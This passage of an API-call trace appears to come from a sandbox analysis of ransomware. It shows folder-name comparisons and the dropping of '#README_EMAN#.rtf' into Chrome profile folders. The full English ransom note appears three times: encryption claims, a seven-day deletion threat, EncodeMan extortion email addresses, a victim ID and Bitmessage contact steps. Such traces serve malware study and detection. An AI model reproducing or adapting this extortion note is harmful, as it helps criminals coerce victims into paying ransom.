lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\", cchCount2=76) returned 3 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\", cchCount2=76) returned 3 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount2=93) returned 3 [0296.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount2=93) returned 1 [0296.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount2=93) returned 1 [0296.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Layouts\\", cchCount2=90) returned 1 [0296.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Layouts\\", cchCount2=90) returned 1 [0296.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Layouts\\", cchCount2=90) returned 1 [0296.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Layouts\\", cchCount2=90) returned 3 [0296.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Layouts\\", cchCount2=90) returned 1 [0296.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Layouts\\", cchCount2=90) returned 1 [0296.924] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\#readme_eman#.rtf")) returned 0x20 [0296.924] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0296.924] GetLastError () returned 0x2 [0296.924] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0297.155] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.155] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.155] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . 